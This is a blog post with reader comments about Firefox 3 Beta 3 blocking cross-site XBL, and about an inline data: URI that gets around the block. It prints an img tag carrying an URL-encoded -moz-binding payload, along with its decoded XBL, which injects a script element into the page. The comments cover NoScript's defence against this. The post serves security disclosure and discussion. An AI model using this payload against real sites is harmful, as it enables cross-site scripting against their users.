Firefox 3 disallows cross-site XBL

Well, I decided to play around a little with Firefox 3 Beta 3 today and discovered that it looks like the ever-popular -moz-binding CSS attribute is now rendered a little less useful. It is now impossible to load off-site XBL via this method.

However, all is not lost. In patching one of the biggest holes in Firefox's security model, the FF devs in their infinite wisdom have made it possible to embed a -moz-binding URL inline, as a data: URI, like this:

<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)" />

This method offers no way to use a fragment identifier, so only the first element in the XBL document can be used. The above XBL decodes to:

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
	<binding id="loader">
	<implementation>
		<constructor>
		<![CDATA[
		var url = "alert.js";
		var scr = document.createElement("script");
		scr.setAttribute("src",url);
		var bodyElement = document.getElementsByTagName("html").item(0);
		bodyElement.appendChild(scr);]]>
		</constructor>
	</implementation>
	</binding>
</bindings>

which simply creates a new DOM script element that loads alert.js into the page.

comment from Giorgio Maone
It's intentional and documented, even though I tend to agree that fixing offsite but introducing this "feature" doesn't sound exactly cool, if the aim of the former was mitigating XSS: http://developer.mozilla.org/en/docs/XBL:XBL_1.0_Reference:Elements#binding
Anyway, this has been largely anticipated by NoScript's XBL protection: as you can see, the default has been forbidding data: bindings for a long time; see http://noscript.net/changelog#1.1.8.5

comment from martin
I agree that NoScript's protection against XBL binding is ace, and I in no way meant to detract from this; it took me ages to work out why a binding wasn't working, and it was good old NoScript doing its job! On the other hand, while the in-line feature is documented, the blocking of cross-domain XBL loading is not so easy to find out about. As I pointed out, one obliterates the security impact of the other.
